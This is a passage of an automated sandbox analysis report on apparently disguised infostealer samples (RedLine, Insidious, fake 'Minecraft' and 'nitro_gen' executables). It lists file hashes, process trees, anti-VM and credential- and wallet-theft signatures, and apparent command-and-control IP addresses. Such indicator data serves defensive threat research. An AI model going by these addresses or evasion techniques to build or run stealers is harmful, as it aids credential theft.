| SHA256 | eaeefa6722c45e486f48a67ba18b4abb3ff0c29e5b30c23445c29a4d0b1cd3e4 |
| SHA512 | a6d24e72bf620ef695f08f5ffde70ef93f42a3fa60f7c76eb0f521393c595717e05ccb7a61ae216c18fe41e95fb238d82637714cf5208ee8f1dd32ae405b5565 |
\Users\Admin\AppData\Local\Temp\_MEI18162\_ssl.pyd
| MD5 | 8ee827f2fe931163f078acdc97107b64 |
| SHA1 | 149bb536f3492bc59bd7071a3da7d1f974860641 |
| SHA256 | eaeefa6722c45e486f48a67ba18b4abb3ff0c29e5b30c23445c29a4d0b1cd3e4 |
| SHA512 | a6d24e72bf620ef695f08f5ffde70ef93f42a3fa60f7c76eb0f521393c595717e05ccb7a61ae216c18fe41e95fb238d82637714cf5208ee8f1dd32ae405b5565 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
\Users\Admin\AppData\Local\Temp\_MEI18162\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\libssl-1_1.dll
| MD5 | fe1f3632af98e7b7a2799e3973ba03cf |
| SHA1 | 353c7382e2de3ccdd2a4911e9e158e7c78648496 |
| SHA256 | 1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b |
| SHA512 | a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0 |
\Users\Admin\AppData\Local\Temp\_MEI18162\libssl-1_1.dll
| MD5 | fe1f3632af98e7b7a2799e3973ba03cf |
| SHA1 | 353c7382e2de3ccdd2a4911e9e158e7c78648496 |
| SHA256 | 1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b |
| SHA512 | a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0 |
memory/1096-94-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_hashlib.pyd
| MD5 | a6448bc5e5da21a222de164823add45c |
| SHA1 | 6c26eb949d7eb97d19e42559b2e3713d7629f2f9 |
| SHA256 | 3692fc8e70e6e29910032240080fc8109248ce9a996f0a70d69acf1542fca69a |
| SHA512 | a3833c7e1cf0e4d181ac4de95c5dfa685cf528dc39010bf0ac82864953106213eccff70785021ccb05395b5cf0dcb89404394327cd7e69f820d14dfa6fba8cba |
\Users\Admin\AppData\Local\Temp\_MEI18162\_hashlib.pyd
| MD5 | a6448bc5e5da21a222de164823add45c |
| SHA1 | 6c26eb949d7eb97d19e42559b2e3713d7629f2f9 |
| SHA256 | 3692fc8e70e6e29910032240080fc8109248ce9a996f0a70d69acf1542fca69a |
| SHA512 | a3833c7e1cf0e4d181ac4de95c5dfa685cf528dc39010bf0ac82864953106213eccff70785021ccb05395b5cf0dcb89404394327cd7e69f820d14dfa6fba8cba |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_queue.pyd
| MD5 | 44b72e0ad8d1e1ec3d8722088b48c3c5 |
| SHA1 | e0f41bf85978dd8f5abb0112c26322b72c0d7770 |
| SHA256 | 4aa1bbde1621c49edab4376cf9a13c1aa00a9b0a9905d9640a2694ef92f77d5e |
| SHA512 | 05853f93c6d79d8f9c96519ce4c195b9204df1255b01329deaa65e29bd3e988d41454cd305e2199404f587e855737879c330638f2f07bff11388a49e67ba896c |
\Users\Admin\AppData\Local\Temp\_MEI18162\_queue.pyd
| MD5 | 44b72e0ad8d1e1ec3d8722088b48c3c5 |
| SHA1 | e0f41bf85978dd8f5abb0112c26322b72c0d7770 |
| SHA256 | 4aa1bbde1621c49edab4376cf9a13c1aa00a9b0a9905d9640a2694ef92f77d5e |
| SHA512 | 05853f93c6d79d8f9c96519ce4c195b9204df1255b01329deaa65e29bd3e988d41454cd305e2199404f587e855737879c330638f2f07bff11388a49e67ba896c |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_bz2.pyd
| MD5 | 3dc8af67e6ee06af9eec52fe985a7633 |
| SHA1 | 1451b8c598348a0c0e50afc0ec91513c46fe3af6 |
| SHA256 | c55821f5fdb0064c796b2c0b03b51971f073140bc210cbe6ed90387db2bed929 |
| SHA512 | da16bfbc66c8abc078278d4d3ce1595a54c9ef43ae8837ceb35ae2f4757b930fe55e258827036eba8218315c10af5928e30cb22c60ff69159c8fe76327280087 |
\Users\Admin\AppData\Local\Temp\_MEI18162\_bz2.pyd
| MD5 | 3dc8af67e6ee06af9eec52fe985a7633 |
| SHA1 | 1451b8c598348a0c0e50afc0ec91513c46fe3af6 |
| SHA256 | c55821f5fdb0064c796b2c0b03b51971f073140bc210cbe6ed90387db2bed929 |
| SHA512 | da16bfbc66c8abc078278d4d3ce1595a54c9ef43ae8837ceb35ae2f4757b930fe55e258827036eba8218315c10af5928e30cb22c60ff69159c8fe76327280087 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_lzma.pyd
| MD5 | 37057c92f50391d0751f2c1d7ad25b02 |
| SHA1 | a43c6835b11621663fa251da421be58d143d2afb |
| SHA256 | 9442dc46829485670a6ac0c02ef83c54b401f1570d1d5d1d85c19c1587487764 |
| SHA512 | 953dc856ad00c3aec6aeab3afa2deb24211b5b791c184598a2573b444761db2d4d770b8b807ebba00ee18725ff83157ec5fa2e3591a7756eb718eba282491c7c |
\Users\Admin\AppData\Local\Temp\_MEI18162\_lzma.pyd
| MD5 | 37057c92f50391d0751f2c1d7ad25b02 |
| SHA1 | a43c6835b11621663fa251da421be58d143d2afb |
| SHA256 | 9442dc46829485670a6ac0c02ef83c54b401f1570d1d5d1d85c19c1587487764 |
| SHA512 | 953dc856ad00c3aec6aeab3afa2deb24211b5b791c184598a2573b444761db2d4d770b8b807ebba00ee18725ff83157ec5fa2e3591a7756eb718eba282491c7c |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\certifi\cacert.pem
| MD5 | 1ba3b44f73a6b25711063ea5232f4883 |
| SHA1 | 1b1a84804f896b7085924f8bf0431721f3b5bdbe |
| SHA256 | bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197 |
| SHA512 | 0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\unicodedata.pyd
| MD5 | 4c0d43f1a31e76255cb592bb616683e7 |
| SHA1 | 0a9f3d77a6e064baebacacc780701117f09169ad |
| SHA256 | 0f84e9f0d0bf44d10527a9816fcab495e3d797b09e7bbd1e6bd666ceb4b6c1a8 |
| SHA512 | b8176a180a441fe402e86f055aa5503356e7f49e984d70ab1060dee4f5f17fcec9c01f75bbff75ce5f4ef212677a6525804be53646cc0d7817b6ed5fd83fd778 |
\Users\Admin\AppData\Local\Temp\_MEI18162\unicodedata.pyd
| MD5 | 4c0d43f1a31e76255cb592bb616683e7 |
| SHA1 | 0a9f3d77a6e064baebacacc780701117f09169ad |
| SHA256 | 0f84e9f0d0bf44d10527a9816fcab495e3d797b09e7bbd1e6bd666ceb4b6c1a8 |
| SHA512 | b8176a180a441fe402e86f055aa5503356e7f49e984d70ab1060dee4f5f17fcec9c01f75bbff75ce5f4ef212677a6525804be53646cc0d7817b6ed5fd83fd778 |
memory/1520-106-0x0000000000000000-mapping.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
17s
Max time network
120s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\nitro_gen.exe
"C:\Users\Admin\AppData\Local\Temp\nitro_gen.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
memory/1916-116-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
| MD5 | 5b8d83823531d567241106b9cec66d06 |
| SHA1 | 4a34b951287719ca9558fea764262ec8af52f20d |
| SHA256 | 5a12b229ff508e7ecfecdaf3a52da45ec02160587ccb852646e72b789ada6ac5 |
| SHA512 | c7aceaad5b54a23de1f76691dc12184ae381d3dc7409fc582b30938273a09fb2f6538eef886aca5c871ae9243e4eaf399178e44d3cb47666f025ea31ce6b46fd |
memory/1776-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
| MD5 | 5b8d83823531d567241106b9cec66d06 |
| SHA1 | 4a34b951287719ca9558fea764262ec8af52f20d |
| SHA256 | 5a12b229ff508e7ecfecdaf3a52da45ec02160587ccb852646e72b789ada6ac5 |
| SHA512 | c7aceaad5b54a23de1f76691dc12184ae381d3dc7409fc582b30938273a09fb2f6538eef886aca5c871ae9243e4eaf399178e44d3cb47666f025ea31ce6b46fd |
memory/1916-119-0x0000000000C90000-0x0000000000C91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
memory/2888-122-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\python38.dll
| MD5 | d2a8a5e7380d5f4716016777818a32c5 |
| SHA1 | fb12f31d1d0758fe3e056875461186056121ed0c |
| SHA256 | 59ab345c565304f638effa7c0236f26041fd06e35041a75988e13995cd28ace9 |
| SHA512 | ad1269d1367f587809e3fbe44af703c464a88fa3b2ae0bf2ad6544b8ed938e4265aab7e308d999e6c8297c0c85c608e3160796325286db3188a3edf040a02ab7 |
memory/1916-125-0x000000001B990000-0x000000001B992000-memory.dmp
\Users\Admin\AppData\Local\Temp\_MEI17762\VCRUNTIME140.dll
| MD5 | 0e675d4a7a5b7ccd69013386793f68eb |
| SHA1 | 6e5821ddd8fea6681bda4448816f39984a33596b |
| SHA256 | bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1 |
| SHA512 | cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\VCRUNTIME140.dll
| MD5 | 0e675d4a7a5b7ccd69013386793f68eb |
| SHA1 | 6e5821ddd8fea6681bda4448816f39984a33596b |
| SHA256 | bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1 |
| SHA512 | cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66 |
\Users\Admin\AppData\Local\Temp\_MEI17762\python38.dll
| MD5 | d2a8a5e7380d5f4716016777818a32c5 |
| SHA1 | fb12f31d1d0758fe3e056875461186056121ed0c |
| SHA256 | 59ab345c565304f638effa7c0236f26041fd06e35041a75988e13995cd28ace9 |
| SHA512 | ad1269d1367f587809e3fbe44af703c464a88fa3b2ae0bf2ad6544b8ed938e4265aab7e308d999e6c8297c0c85c608e3160796325286db3188a3edf040a02ab7 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\base_library.zip
| MD5 | 19d34805782c4704d1e2a81fe32e9c27 |
| SHA1 | 8c3d99a0616abc478d6230d07f9dc7b38313813e |
| SHA256 | 06f3c20b42de72e69e9c6b2f66f149f5a65161873e30d07129333f53858d97bb |
| SHA512 | 267b8db8751ea170cd2e04ff5a4d87b0b65edc6d251a8016c213c97bcd8f3a12d955fc25860147b303b153b00d0a41191c09ed24e6fd4b95cb34ae98009456a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_ctypes.pyd
| MD5 | f1e33a8f6f91c2ed93dc5049dd50d7b8 |
| SHA1 | 23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4 |
| SHA256 | 9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4 |
| SHA512 | 229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5 |
\Users\Admin\AppData\Local\Temp\_MEI17762\libffi-7.dll
| MD5 | 4424baf6ed5340df85482fa82b857b03 |
| SHA1 | 181b641bf21c810a486f855864cd4b8967c24c44 |
| SHA256 | 8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79 |
| SHA512 | 8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\libffi-7.dll
| MD5 | 4424baf6ed5340df85482fa82b857b03 |
| SHA1 | 181b641bf21c810a486f855864cd4b8967c24c44 |
| SHA256 | 8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79 |
| SHA512 | 8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33 |
\Users\Admin\AppData\Local\Temp\_MEI17762\_ctypes.pyd
| MD5 | f1e33a8f6f91c2ed93dc5049dd50d7b8 |
| SHA1 | 23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4 |
| SHA256 | 9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4 |
| SHA512 | 229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5 |
\Users\Admin\AppData\Local\Temp\_MEI17762\_socket.pyd
| MD5 | d6bae4b430f349ab42553dc738699f0e |
| SHA1 | 7e5efc958e189c117eccef39ec16ebf00e7645a9 |
| SHA256 | 587c4f3092b5f3e34f6b1e927ecc7127b3fe2f7fa84e8a3d0c41828583bd5cef |
| SHA512 | a8f8fed5ea88e8177e291b708e44b763d105907e9f8c9e046c4eebb8684a1778383d1fba6a5fa863ca37c42fd58ed977e9bb3a6b12c5b8d9ab6ef44de75e3d1e |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_socket.pyd
| MD5 | d6bae4b430f349ab42553dc738699f0e |
| SHA1 | 7e5efc958e189c117eccef39ec16ebf00e7645a9 |
| SHA256 | 587c4f3092b5f3e34f6b1e927ecc7127b3fe2f7fa84e8a3d0c41828583bd5cef |
| SHA512 | a8f8fed5ea88e8177e291b708e44b763d105907e9f8c9e046c4eebb8684a1778383d1fba6a5fa863ca37c42fd58ed977e9bb3a6b12c5b8d9ab6ef44de75e3d1e |
\Users\Admin\AppData\Local\Temp\_MEI17762\select.pyd
| MD5 | 6ae54d103866aad6f58e119d27552131 |
| SHA1 | bc53a92a7667fd922ce29e98dfcf5f08f798a3d2 |
| SHA256 | 63b81af5d3576473c17ac929bea0add5bf8d7ea95c946caf66cbb9ad3f233a88 |
| SHA512 | ff23f3196a10892ea22b28ae929330c8b08ab64909937609b7af7bfb1623cd2f02a041fd9fab24e4bc1754276bdafd02d832c2f642c8ecdcb233f639bdf66dd0 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\select.pyd
| MD5 | 6ae54d103866aad6f58e119d27552131 |
| SHA1 | bc53a92a7667fd922ce29e98dfcf5f08f798a3d2 |
| SHA256 | 63b81af5d3576473c17ac929bea0add5bf8d7ea95c946caf66cbb9ad3f233a88 |
| SHA512 | ff23f3196a10892ea22b28ae929330c8b08ab64909937609b7af7bfb1623cd2f02a041fd9fab24e4bc1754276bdafd02d832c2f642c8ecdcb233f639bdf66dd0 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
\Users\Admin\AppData\Local\Temp\_MEI17762\libssl-1_1.dll
| MD5 | fe1f3632af98e7b7a2799e3973ba03cf |
| SHA1 | 353c7382e2de3ccdd2a4911e9e158e7c78648496 |
| SHA256 | 1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b |
| SHA512 | a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0 |
\Users\Admin\AppData\Local\Temp\_MEI17762\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\libssl-1_1.dll
| MD5 | fe1f3632af98e7b7a2799e3973ba03cf |
| SHA1 | 353c7382e2de3ccdd2a4911e9e158e7c78648496 |
| SHA256 | 1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b |
| SHA512 | a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0 |
\Users\Admin\AppData\Local\Temp\_MEI17762\_ssl.pyd
| MD5 | 8ee827f2fe931163f078acdc97107b64 |
| SHA1 | 149bb536f3492bc59bd7071a3da7d1f974860641 |
| SHA256 | eaeefa6722c45e486f48a67ba18b4abb3ff0c29e5b30c23445c29a4d0b1cd3e4 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
16s
Max time network
140s
Command Line
Signatures
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Reads user/profile data of web browsers
Themida packer
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Bird.exe
"C:\Users\Admin\AppData\Local\Temp\Bird.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 65.21.103.71:56458 | 65.21.103.71 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win7v20210410
Max time kernel
42s
Max time network
80s
Command Line
Signatures
RedLine
RedLine Payload
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1644 set thread context of 1584 | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 109.248.201.150:63757 | 109.248.201.150 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210408
Max time kernel
58s
Max time network
141s
Command Line
Signatures
RedLine
RedLine Payload
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3260 set thread context of 928 | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.4.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 109.248.201.150:63757 | 109.248.201.150 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files